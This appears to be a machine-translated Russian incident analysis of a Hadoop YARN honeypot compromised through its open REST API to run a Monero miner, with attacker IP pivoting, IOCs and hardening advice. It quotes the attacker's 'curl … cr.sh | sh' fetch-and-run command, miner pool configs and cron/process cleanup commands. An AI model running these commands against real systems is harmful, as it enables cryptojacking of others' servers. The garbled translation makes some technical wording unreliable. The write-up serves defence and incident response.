УВЕДОМЛЕНИЕ ДЛЯ ЧИТАТЕЛЕЙ: ДАННАЯ СТАТЬЯ ПРЕДНАЗНАЧЕНА ДЛЯ ПРОФЕССИОНАЛОВ КИБЕРБЕЗОПАСНОСТИ.
НЕ ВОССТАНОВИТЕ ОПУБЛИКОВАННЫЕ ССЫЛКИ!
Вы не понимаете сложность определенных предметов, если не когда вы сталкиваетесь, и, как правило, слишком поздно.
Чтобы попытаться заставить людей понять, что такое «кибер», эти последние несколько ночей я поставил на компьютер, и в образовательных целях я создал среду HDFS1 не защищены, чтобы понять, что может произойти в случае установки и настройки среды, не должным образом «затвердевшей» или контролируемой, или наиболее распространенного случая установок, выполняемых неквалифицированным или не особо тщательным техническим персоналом.
Сообщается, что существует проблема безопасности с системой управления ресурсами Hadoop Yarn (несанкционированный доступ в API REST2), с помощью которого вы можете удаленно выполнять произвольный код. Как только инфраструктура была создана, я просто ждал развития событий. Через неделю я обнаружил, что созданная инфраструктура была атакована и скомпрометирована.
Затем я приступил к анализу одного из компромиссов и предоставит советы и решения по безопасности для решения этой проблемы.
Выбранный случай является случаем добычи полезных ископаемых di criptocurrency
Для начала давайте попробуем понять что-то еще об инфраструктуре, используемой как "соблазн3».
Hadoop представляет собой распределенную инфраструктуру системы, разработанную Apache Foundation, единой платформой управления ресурсами для систем hadoop, основная роль которой заключается в достижении единого управления и планирования ресурсов кластера (обычно используется для управления данными, такими как виды Файловая система распространяемый). рамки Расчет MapReduce может быть выполнен как прикладная программа. Выше - система YARN, управление ресурсами осуществляется через YARN. Проще говоря, пользователь может отправлять определенные прикладные программы в YARN для выполнения, которые могут включать в себя выполнение их системных команд.
YARN предоставляет API REST, которые по умолчанию открыты на портах 8088 и 8090, поэтому любой пользователь через API может выполнять отправку действий и других операций в прямом режиме. Если они настроены неправильно, API-интерфейсы REST будут открыты в общедоступной сети (например, в Интернете, если вы решите использовать кластер HDFS на облако) и позволит несанкционированный доступ к созданной системе. В конечном счете, поэтому плохая конфигурация гарантирует, что любой злоумышленник может использовать инфраструктуру для выполнения удаленных команд, чтобы выполнять операции добычи полезных ископаемых4 или другие вредоносные действия в системе.
Почему такая деятельность очень тонкая?
Поскольку трудно вставить системы безопасности в кластеры HDFS или использовать системы для включения проверки подлинности Kerberos, предотвращения анонимного доступа (обновления версий) или проверки Мониторинг это связано с тем, что эти структуры рождаются, чтобы максимизировать производительность системы, используемой для запуска запрос ed аналитика уже сам по себе дорогой с вычислительной точки зрения.
Обнаружены проступки злонамеренной деятельности
-
Анализ вторжений
На машине, используемой в качестве приманки, она была установлена и настроена в режиме Hadoop YARN по умолчанию, это само по себе создает проблему безопасности несанкционированного доступа к системе. L 'нарушитель напрямую использует API REST, открытый на порт 8088, после гусеничный5 конкретно определяет набор открытых дверей, предварительно настроенных исполнителем. На этом этапенарушитель может отправлять исполняемые команды для загрузки и выполнения скрипта6 .sh на сервере (приложен 1 весь найденный скрипт, cr.sh). более скачать они впоследствии начнут процесс добычи полезных ископаемых.
Весь процесс относительно прост и хорошо структурирован, и вы можете увидеть, прочитав сценарий, что ничего не остается случайным, например, некоторые проверки, которые выполняются на сервер Гость Hadoop.
Команда, найденная и выполненная, интересна:
exec / bin / bash -c "curl 185.222.210.59/cr.sh | sh & disown"
Я останавливаюсь на этой команде, чтобы выделить два очень важных аспекта, которые являются IP-адресом, с которого загружается скрипт, и некоторыми действиями, которые служат для маскировки вредоносных действий7.
Если мы продолжим анализ кода внутри скрипта cr.sh, то легко заметить, что автор этого вопроса обратил особое внимание на устранение следов выполненных действий.8.
На этом этапе, в общем, можно сказать, что весь скрипт очень подробно, и кажется, что каждая функция вложена и вызвана, многие файлы задействованы во всем процессе, поэтому мы можем сообщить об основных шагах в соответствии со следующей моделью:
-
Очистка связанных процессов, файлов и действий crontab;
-
Судите и загрузите программу добычи полезных ископаемых, одновременно проверьте значение MD5, в дополнение к проверенному серверу также используйте https: // transfer.sh для предоставления скачать резервное копирование;
-
Добавляет активность выполнения скачать из скрипт в кронтабе.
Основными показателями, вытекающими из анализа, являются следующие:
-
185.222.210.59;
-
cr.sh
-
MD5 check c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242
-
http:// 185.222.210.59/re.php
-
xmrig_64 или xmrig_32
Мы проверим с циклом OSINF9 индикаторы выше.
-
185.222.210.59
Мы пытаемся проверить происхождение этого IP-адреса. На следующем рисунке показаны следующие основные поля:
На некоторых форумах10 производителей / компаний для выпуска платформ на основе HDFS, IP-адрес и точная строка, найденная и в нашем скрипте, сообщаются, запрашивая объяснения. В некоторых случаях он спрашивает, является ли это стандартной конфигурацией. Все благодаря некоторым администраторам HDFS, которые выполняют ручные и апериодические проверки, нет автоматизма.
Перейдя к проверке работы сервера, вы получите следующее:
Основная информация
OS |
Debian |
протоколы |
80 / HTTP и 22 / SSH |
-
80 / HTTP
GET / |
|
сервер |
Apache httpd 2.4.10 |
Строка состояния |
200 ОК |
Название страницы |
Страница Apache2 Debian по умолчанию: она работает |
GET / |
-
22 / SSH
SSHv2 Рукопожатие |
|
сервер |
OpenSSH 6.7p1 |
баннер |
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 |
Главный ключ |
|
Алгоритм |
ECDSA-sha2-nistp256 |
Отпечаток пальца |
5a5c81f8dbc3e3d9fc57557691912a75b3be0d42ea5b30a2e7f1e584cffc5f40 |
Согласованный алгоритм |
|
Обмен ключами |
curve25519- sha256 @ libssh .org |
Симметричный шифр |
aes128-ctr | aes128-СУУ |
MAC |
hmac-sha2-256 | HMAC-sha2-256 |
Также было проверено, что существует открытый порт 111, соответствующий службе portmap. Поэтому со стороны сервер является Portmapper прослушивание порта 111 (Portmapper), со стороны клиент существует ряд программ, которые для любой службы RPC11, сначала необходимо связаться с Portmapper удаленный, который предоставляет им информацию, необходимую для установления соединения с демон компетентны. Возможная уязвимость в сервисе также может быть проверена, но это не является объектом исследования и аналитической деятельности.
Итак сервер в вопросе «подключен» и, вероятно, поддерживается через порт 22 с протоколом ssh, что гарантирует зашифрованное соединение. Из поля 22.ssh.v2.server_host_key.fingerprint_sha256, т. е. из отпечаток пальца из ssh сервера, поиск показывает, что других нет.
Сообщается также, что в 80.http.get.headers.last_modified показана дата Wed, 16 May 2018 14: 58: 53 GMT
Il сервер принадлежит адресной доступности компании PRISM BUSINESS SERVICES LTD, которая с основного сайта http: // www. prismbusiness.co.uk/about-us/, похоже, имеет отношение не к деятельности, связанной с техническим сектором ИКТ, а к другим областям. Если у них есть активные серверы в контексте облако, возможно, сконфигурированные и / или иным образом управляемые при необходимости, могут не знать о их текущем использовании.
Отображается вся сеть их доступности:
На анализируемом IP-адресе нет разрешения DNS.
-
cr.sh
Lo скрипт cr.sh, который был проанализирован, имеет следующее MD5 48e79f8de26fa56d955a28c2de493132, однако, нет никаких признаков индексации в Интернете.
-
MD5 check c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242
Сообщается, что MD5 соответствует файлам, загруженным во время выполнения скрипта, и показаны в следующей таблице:
Имя файла |
MD5 |
xmrig_64 |
c8c1f2da51fbd0aea60e11a81236c9dc |
xmrig_32 |
5110222de7330a371c83af67d46c4242 |
Файлы, показанные выше, являются ядром выполнения Доказательство работы (PoW) одного криптовалюта хорошо известно, это действительно Моннеро.
-
https:// transfer.sh/ixQBE/zzz
Интересным является использование transfer.sh, который оказывается одним Тактика, методы и процедуры (ТТП) поведения этого нарушитель, который получает резервную копию для загрузки исполняемых файлов добыча данных.
Фактически, было обнаружено, что transfer.sh - это не что иное, как быстрый и простой обмен файлами из командной строки. Этот код содержит сервер со всем необходимым для создания собственного экземпляра ", все это доступно для загрузки на https: // github.com/dutchcoders/transfer.sh и на веб-сайте https: // transfer.sh/, где есть объяснения использования с вариантом использования, чтобы его можно было легко интегрировать и настраивать. Процесс повторное использование кода в настоящее время широко используется как в контексте Киберпреступность в гораздо более широких контекстах, чем Cyber Espionage o Cyber Intelligenge.
-
http:// 185.222.210.59/g.php
Сегодня страница 02 June 2018 отвечает на IP-адрес 95.142.40.81, тогда как на момент открытия скрипт отображаемый IP-адрес был 46.30.42.162, Оба имеют одинаковое поведение, введенное как переменная f1, после выполнения проверок с помощью getconf LONG_BIT загружаются исполняемые файлы xmrig_64 или xmrig_32. Очевидно, что это позволяет, если обнаружено злоумышленное первое IP-адрес, но не IP-адрес управления и управления 185.222.210.59, сделать ненужными некоторые элементы управления безопасностью, такие как черный список da Межсетевые экраны, неграмотная классификация Websense o предупреждение SIEM доступны для SOC.
Посмотрим, можем ли мы извлечь что-то из двух IP-адресов:
46.30.42.162
Адрес приводит к доступности Eurobyte VPS, и адресация содержит класс адресов байт 24 при наличии этого хостинга, который имеет российское происхождение.
Это тоже сервер, приводит к открытию портов 22 и 80 с операционной системой Debian.
Ниже приведены найденные детали:
Основная информация
OS |
Debian |
Cеть |
MCHOST - AS (RU) |
Маршрутизация |
46.30.42.0 / 24 через AS7018, AS3356, AS35415, AS48282 |
протоколы |
80 / HTTP и 22 / SSH |
-
80 / HTTP
GET / |
|
сервер |
Apache httpd 2.4.10 |
Строка состояния |
200 ОК |
Название страницы |
Страница Apache2 Debian по умолчанию: она работает |
GET / |
-
22 / SSH
SSHv2 Рукопожатие |
|
сервер |
OpenSSH 6.7p1 |
баннер |
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 |
Главный ключ |
|
Алгоритм |
ECDSA-sha2-nistp256 |
Отпечаток пальца |
3e88599d935de492c07f93e313201aa340b7ff0a5f66a330a0c5ab660cf95fad |
Согласованный алгоритм |
|
Обмен ключами |
curve25519- sha256 @ libssh .org |
Симметричный шифр |
aes128-ctr | aes128-СУУ |
MAC |
hmac-sha2-256 | HMAC-sha2-256 |
Отмечается, что поиск, основанный на отпечатке ключа хоста, показывает, что есть другие серверы 41 с одной и той же сигнатурой. Из этих серверов 41 даже новый IP-адрес 95.142.40.81 находится в доступности злоумышленника.
С этими данными мы можем предположить, что мы нашли один бассейн инфраструктура первого уровня этого сингла нарушитель или группа Cyber Crime.
Сообщается о адресации и любой информации, полезной для последующих действий:
95.142.40.74 (vz232259.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
185.154.53.249 (vz232259.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
95.142.40.89 (vz229526.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
95.142.40.190 (vz232259.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
95.142.40.189 (vz232259.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
46.30.47.115 (vz227413.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
95.142.39.241 (shimshim.info) |
AS (48282) Россия Месторасположение: Россия база данных mysql |
95.142.40.188 (vz232259.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
46.30.41.207 (vz230806.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
46.30.41.182 (vz230501.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
95.142.39.251 (vz232259.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
185.154.53.67 (vz232259.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
185.154.53.65 (profshinservice.ru) |
AS (48282) Россия Месторасположение: Россия |
46.30.45.91 (vz220153.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
185.154.53.46 (server.badstudio.ru) |
AS (48282) Россия Месторасположение: Россия |
46.30.41.80 (track.dev) |
AS (48282) Россия Месторасположение: Россия |
46.30.45.152 (vz230274.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
185.154.53.72 (vz231895.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
185.154.53.137 (vz224405.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
95.142.39.151 (donotopen.ru) |
AS (48282) Россия Месторасположение: Россия база данных mysql |
185.154.52.117 (vz230686.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
46.30.47.157 (vz228859.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
95.142.40.83 (vz228857.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
95.142.40.86 (kolos1952.ru) |
AS (48282) Россия Месторасположение: Россия база данных mysql |
95.142.40.81 (vz228855.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
46.30.42.162 (server.com) |
AS (48282) Россия Месторасположение: Россия |
95.142.40.82 (vz228856.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
46.30.43.128 (vz228757.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
185.154.52.236 (supportt.ru) |
AS (48282) Россия Месторасположение: Россия база данных mysql |
95.142.39.109 (vz228627.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
95.142.40.44 (vz229990.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
95.142.39.164 (vz232259.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
46.30.45.30 (shop.engine) |
AS (48282) Россия Месторасположение: Россия |
95.142.39.172 (hosting-by.wikhost.com) |
AS (48282) Россия Месторасположение: Россия база данных mysql |
185.154.52.161 (piar60.ru) |
AS (48282) Россия Месторасположение: Россия база данных mysql |
95.142.40.87 (regiister.ru) |
AS (48282) Россия Месторасположение: Россия база данных mysql |
95.142.40.88 (buled.ru) |
AS (48282) Россия Месторасположение: Россия база данных mysql |
185.154.53.190 (vz228963.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия база данных mysql |
46.30.41.51 (vz225213.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
185.154.53.108 (vz224405.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
185.154.52.181 (vz224405.eurodir.ru) |
AS (48282) Россия Месторасположение: Россия |
Вместо этого метаданные, касающиеся анализа IP 41 выше:
Все найденные адреса, обратитесь к AS MCHOST-AS, RU:
1-th Street Frezernaiy, 2 / 1 XENUMX штрихи
109202 Москва
РОССИЯ ФЕДЕРАЦИИ
телефон: + 7 495 6738456
факс: + 7 495 6738456
e-mail: info (at) mchost (dot) ru
Сроки обслуживания: RU
-
http:// 185.222.210.59/w.conf
Сегодня:
{
«algo»: «криптонайт»,
«background»: true,
«colors»: false,
«Повторные попытки»: 5,
«retry-pause»: 5,
«donate-level»: 1,
"syslog": false,
«log-file»: null,
«время печати»: 60,
«av»: 0,
«безопасный»: ложный,
«max-cpu-usage»: 95,
«cpu-priority»: 4,
"threads": null,
«пулы»: [
{
"url": "stratum + tcp: // 46.30.43.159: 80",
«пользователь»: «h»,
«pass»: «h»,
«keepalive»: правда,
«nicehash»: false,
«вариант»: -1
}
],
"api": {
«порт»: 0,
"access-token": null,
"worker-id": null
}
}
Во время открытия скрипт:
{
«algo»: «криптонайт»,
«background»: true,
«colors»: false,
«Повторные попытки»: 5,
«retry-pause»: 5,
«donate-level»: 1,
"syslog": false,
«log-file»: null,
«время печати»: 60,
«av»: 0,
«безопасный»: ложный,
«max-cpu-usage»: 95,
«cpu-priority»: 4,
"threads": null,
«пулы»: [
{
"url": "stratum + tcp: // 179.60.146.10: 5556",
«пользователь»: «h»,
«pass»: «h»,
«keepalive»: правда,
«nicehash»: false,
«вариант»: -1
},
{
"url": "stratum + tcp: // 46.30.43.159: 80",
«пользователь»: «h»,
«pass»: «h»,
«keepalive»: правда,
«nicehash»: false,
«вариант»: -1
}
],
"api": {
«порт»: 0,
"access-token": null,
"worker-id": null
}
}
Важно подчеркнуть, как файл conf определяет два важных показателя для этапа анализа (мы также можем определить три):
-
stratum + tcp: // 46.30.43.159: 80 (общий для разных дат);
-
stratum + tcp: // 179.60.146.10: 5556 (только в первом поиске);
-
«algo»: «криптонайт»;
Давайте проанализируем первый IP-адрес 46.30.43.159, Этот IP-адрес в наличии Eurobyte VPS, русский, имеет PTR vz230703.eurodir.ru и является частью сети 46.30.43.0 / 24. PTR IP-адресов сеть, прилагаемый 1 показывает весь класс, у них есть что-то особенное. Я сообщаю в таблице ниже PTR со сходством без поля А, Я 41:
IP |
PTR |
46.30.43.13 |
vz94180.eurodir.ru |
46.30.43.17 |
vz203045.eurodir.ru |
46.30.43.21 |
vz206109.eurodir.ru |
46.30.43.23 |
vz216100.eurodir.ru |
46.30.43.24 |
vz174272.eurodir.ru |
46.30.43.30 |
vz35015.eurodir.ru |
46.30.43.57 |
vz78210.eurodir.ru |
46.30.43.58 |
vz229754.eurodir.ru |
46.30.43.61 |
vz35015.eurodir.ru |
46.30.43.64 |
vz38207.eurodir.ru |
46.30.43.66 |
vz86195.eurodir.ru |
46.30.43.70 |
vz173527.eurodir.ru |
46.30.43.77 |
vz174931.eurodir.ru |
46.30.43.79 |
vz195563.eurodir.ru |
46.30.43.82 |
vz197086.eurodir.ru |
46.30.43.90 |
vz120816.eurodir.ru |
46.30.43.93 |
vz173527.eurodir.ru |
46.30.43.98 |
vz94065.eurodir.ru |
46.30.43.101 |
vz216360.eurodir.ru |
46.30.43.102 |
vz195005.eurodir.ru |
46.30.43.123 |
vz212299.eurodir.ru |
46.30.43.128 |
vz228757.eurodir.ru |
46.30.43.130 |
vz168899.eurodir.ru |
46.30.43.156 |
vz195735.eurodir.ru |
46.30.43.159 |
vz230703.eurodir.ru |
46.30.43.161 |
vz171964.eurodir.ru |
46.30.43.166 |
vz123353.eurodir.ru |
46.30.43.170 |
vz224733.eurodir.ru |
46.30.43.172 |
vz226924.eurodir.ru |
46.30.43.184 |
vz171966.eurodir.ru |
46.30.43.186 |
vz162078.eurodir.ru |
46.30.43.214 |
vz207073.eurodir.ru |
46.30.43.219 |
vz110518.eurodir.ru |
46.30.43.224 |
vz98980.eurodir.ru |
46.30.43.226 |
vz100250.eurodir.ru |
46.30.43.229 |
vz110562.eurodir.ru |
46.30.43.232 |
vz228251.eurodir.ru |
46.30.43.237 |
vz162078.eurodir.ru |
46.30.43.244 |
vz207073.eurodir.ru |
46.30.43.245 |
vz174272.eurodir.ru |
46.30.43.246 |
vz157495.eurodir.ru |
Также в этом случае менеджер может не знать, что некоторые из этих серверов под его доступностью используются для сторонних целей, однако их следует анализировать один за другим, чтобы найти дополнительные сходства.
Анализируя 179.60.146.10вместо этого мы имеем следующее:
ECDSA key fingerprint is SHA256:62Jyi3X1dEJRIH85kJ0Ee20aW+PEK5g976Xk3yGKVHQ
Результат порта 22, 111, 5555 открытый и это тоже сервер использует OpenSSHVersion: 6.7p1 Debian 5 + deb8u3
К сожалению, никаких других доказательств нет.
Cryptonight вместо этого, это сильный показатель того, что вы хотите сделать, как только вы нажмете цель, В частности, целью является подорвать блоки криптовалюта Моннеро, входя в цель в пределах бассейна dell'intruder, Выбор не случайный. Протокол Cryptonight Было изучено, что оно шахтер которые не имеют доступ к ASIC или кластеру очень дорогих видеокарт, но вы можете использовать классические процессоры ПК, ноутбуков или MiniPC.
Действительно, CryptoNight используется для добычи полезных ископаемых из тех монет, которые характеризуются протоколом CryptoNote. Это функция, строго связанная с памятью (жесткий хеш памяти), в этом случае к кеш-памяти третьего уровня для ЦП, поскольку она ориентирована на задержку, Это ограничение было введено для того, чтобы сделать CryptoNight неэффективным в таких системах, как GPU и FPGA, не оснащенные кэш-памятью и, следовательно, неблагоприятные для использования алгоритма.
Размеры блокнот от CryptoNight - около 2 МБ памяти для каждого экземпляра по следующим причинам:
-
он может содержаться в кэшах L3 (на ядро) современных процессоров;
-
внутренняя память мегабайт è уна неприемлемый размер для традиционного трубопровода ASIC;
-
Графические процессоры могут запускать сотни нить но они имеют гораздо более низкую задержку, чем кеш L3 современных процессоров;
-
значительное расширение блокнот потребует увеличения взаимодействия. Если узел потратил значительное количество времени на хэш блока, его можно было бы легко затопить с помощью механизма затопление ложных блоков, вызывающих DDoS.
модернизация
Именно в эти дни произошла модификация скрипт cr.sh, конфигурационных файлов и исполняемых файлов.
Загрузка исполняемых файлов на дату добычи полезных ископаемых он получается из IP-адреса 95.142.40.83, что привело к идентификации через отпечаток пальца ключа ssh, дополнительные IP-адреса, доступные длянарушитель.
В приведенной ниже таблице показаны данные 20 по IP-адресам 65, так как у вас нет возможности получить их все навалом (нехватка времени и аккаунт платный недоступен) с теми же ключами SSH и те же конфигурации.
95.142.39.233 vz231616.eurodir.ru |
McHost.Ru Добавлено в 2018-06-03 03: 44: 26 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
46.30.43.128 vz228757.eurodir.ru |
EuroByte LLC Добавлено в 2018-06-03 03: 35: 03 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
46.30.47.107 vz227413.eurodir.ru |
EuroByte LLC Добавлено в 2018-06-03 03: 15: 02 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
46.30.41.182 vz230501.eurodir.ru |
EuroByte LLC Добавлено в 2018-06-02 21: 01: 28 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
46.30.47.21 vz227411.eurodir.ru |
Linux 3.x EuroByte LLC Добавлено в 2018-06-02 16: 48: 39 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
95.142.40.188 vz232259.eurodir.ru |
McHost.Ru Добавлено в 2018-06-02 12: 58: 55 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
46.30.45.30 shop.engine |
EuroByte LLC Добавлено в 2018-06-02 09: 45: 16 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
95.142.40.81 vz228855.eurodir.ru |
McHost.Ru Добавлено в 2018-06-02 07: 11: 32 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
185.154.53.137 vz224405.eurodir.ru |
EuroByte LLC Добавлено в 2018-06-02 07: 04: 48 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
46.30.47.82 vz227413.eurodir.ru |
EuroByte LLC Добавлено в 2018-06-02 04: 55: 14 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
185.154.53.67 vz232259.eurodir.ru |
EuroByte LLC Добавлено в 2018-06-02 03: 45: 39 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
95.142.40.87 regiister.ru |
McHost.Ru Добавлено в 2018-06-01 22: 04: 23 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
46.30.47.66 vz227407.eurodir.ru |
EuroByte LLC Добавлено в 2018-06-01 18: 17: 26 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
185.154.52.236 supportt.ru |
EuroByte LLC Добавлено в 2018-06-01 11: 27: 17 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
46.30.47.35 vz227411.eurodir.ru |
Linux 3.x EuroByte LLC Добавлено в 2018-06-01 11: 07: 16 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
185.154.53.46 server.badstudio.ru |
EuroByte LLC Добавлено в 2018-06-01 07: 22: 23 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
95.142.40.89 vz229526.eurodir.ru |
McHost.Ru Добавлено в 2018-05-31 14: 07: 45 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
46.30.42.162 server.com |
EuroByte LLC Добавлено в 2018-05-31 12: 56: 26 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
95.142.39.102 vz222177.eurodir.ru |
McHost.Ru Добавлено в 2018-05-31 10: 05: 30 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
95.142.40.86 kolos1952.ru |
McHost.Ru Добавлено в 2018-05-31 09: 42: 31 GMT Российская Федерация SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Тип ключа: ssh-rsa |
Вот несколько подробных графиков:
Кроме того, загружаемые файлы отображаются следующим образом:
Имя файла |
MD5 |
xm64 |
183664ceb9c4d7179d5345249f1ee0c4 |
xm32 |
b00f4bbd82d2f5ec7c8152625684f853 |
В дополнение к вышесказанному, в скрипт, присутствуют следующие команды:
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
pkill -f jvs
pkill -f javs
pkill -f 192.99.142.248
rm -rf / tmp / pscd *
rm -rf / var / tmp / pscd *
crontab -l | sed '/ 192.99.142.232 / d' | crontab -
crontab -l | sed '/ 192.99.142.226 / d' | crontab -
crontab -l | sed '/ 192.99.142.248 / d' | crontab -
crontab -l | sed '/ logo4 / d' | crontab -
crontab -l | sed '/ logo9 / d' | crontab -
crontab -l | sed '/ logo0 / d' | crontab -
Использование команды sed, которая не часто встречается в программировании, сразу же очевидна, поэтому она тоже может оказаться среди TTP, используемых враждебным актером.
Сед - один поток редактор, используемый для выполнения текстовых преобразований во входном потоке (файл или вход из конвейера); это способность sed фильтровать текст в конвейере, который отличает его определенным образом от других типов редакторов.
В этом контексте он используется для устранения любого следа от операций cron. Вероятно, в процессе анализа не известны действия по вторжению, поскольку они получены из прошлых действий, которые затем менялись, чтобы получить ожидаемое.
Выполнение анализа IP-адресов 192.99.142.232, 192.99.142.226, 192.99.142.248, мы получаем, что компанией (ISP) является OVH Hosting с местонахождением в Канаде.
У всех есть возможность подключения портов 22, ssh. Если, однако, они рассматриваются как злонамеренные IP-адреса, например, ссылаясь на то, что сообщается в ссылке https://www. joesandbox.com/index.php/analysis/49178/0/executive, где объявлено использование powershell, обогащая поиск, мы проверяем, что IP-адрес 192.99.142.232 имеет тот же отпечаток, что и IP-адрес 85.214.102.143, расположенный в Германии в наличие провайдера Strato AG. Однако у адреса есть сертификат 443.https.tls.certificate.parsed.fingerprint_sha1: 78e477a2406935666a2eac4e44646d2ffe0a6d9b, который также привязывает его к следующим IP-адресам: 85.214.125.15 (emma.smartmessaging.com) Debian OS Meter, 85.214.60.153. busware.de) ОС Debian.
от |
Отпечатку пальца ssh |
Отпечаток пальца tls |
192.99.142.232 |
85.214.102.143 |
85.214.125.15 |
85.214.60.153 |
Что касается IP 192.99.142.248, см. рисунок ниже, который показывает, что было выражено до сих пор в документе.
У вас нет существенных сведений о другом IP-адресе 192.99.142.226
Рекомендации по безопасности
-
Используйте верхнюю часть, чтобы увидеть процесс и убить ненормальный процесс.
-
Проверьте каталог / tmp и / var / tmp и удалить i файл как java, ppc, ppl3, config.json и w.conf
-
Проверьте список мероприятий кронтаб и устранить аномалии
-
Анализ журналов YARN, подтверждает аномальное применение, устранение обработки.
Укрепление безопасности
-
Настройте политики доступа через Iptables o группы безопасности для ограничения доступа к портам, таким как 8088;
-
если нет необходимости, не открывайте интерфейс в общедоступной сети и не изменяйте его в локальных или интрасети;
-
обновите Hadoop до 2.x и включите аутентификацию Kerberos для предотвращения анонимного доступа.
МОК
Адрес кошелька
4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
MD5
-
MD5 (xmrig_64) = c8c1f2da51fbd0aea60e11a81236c9dc
-
MD5 (xmrig_32) = 5110222de7330a371c83af67d46c4242
-
MD5 (xm64) = 183664ceb9c4d7179d5345249f1ee0c4
-
MD5 (xm32) = b00f4bbd82d2f5ec7c8152625684f853
-
MD5 (cr.sh) = 1e8c570de8acc2b7e864447c26c59b32
-
MD5 (cr.sh) = 48e79f8de26fa56d955a28c2de493132
-
MD5 (w.conf) = 777b79f6ae692d8047bcdee2c1af0fd6
-
MD5 (c.conf) = 9431791f1dfe856502dcd58f47ce5829
Адреса в порядке приоритета
-
185.222.210.59 (представляется IP-адресом источника);
-
46.30.43.159 (соединение с пуломнарушитель, проколотный слой + tcp);
-
179.60.146.10 (соединение с пуломнарушитель, проколотный слой + tcp);
-
95.142.40.83 (скачать файл добыча данных);
-
95.142.40.81 (скачать файл добыча данных);
-
46.30.42.162 (скачать файл добыча данных);
-
192.99.142.248 (связь с уклонениями);
-
192.99.142.232 (связь с уклонениями);
-
192.99.142.226 (связь с уклонениями);
-
85.214.102.143 (отпечаток пальца общий с адресами выше);
-
85.214.125.15 (отпечаток пальца общий с адресами выше);
-
85.214.60.153 (отпечаток пальца общий с вышеупомянутыми адресами).
Адреса подозреваемых, принадлежащих кнарушитель
185.154.52.117 (vz230686.eurodir.ru) |
185.154.52.161 (piar60.ru) |
185.154.52.181 (vz224405.eurodir.ru) |
185.154.52.236 (supportt.ru) |
185.154.53.108 (vz224405.eurodir.ru) |
185.154.53.137 (vz224405.eurodir.ru) |
185.154.53.190 (vz228963.eurodir.ru) |
185.154.53.249 (vz232259.eurodir.ru) |
185.154.53.46 (server.badstudio.ru) |
185.154.53.65 (profshinservice.ru) |
185.154.53.67 (vz232259.eurodir.ru) |
185.154.53.72 (vz231895.eurodir.ru) |
46.30.41.182 (vz230501.eurodir.ru) |
46.30.41.207 (vz230806.eurodir.ru) |
46.30.41.51 (vz225213.eurodir.ru) |
46.30.41.80 (track.dev) |
46.30.42.162 (server.com) |
46.30.43.128 (vz228757.eurodir.ru) |
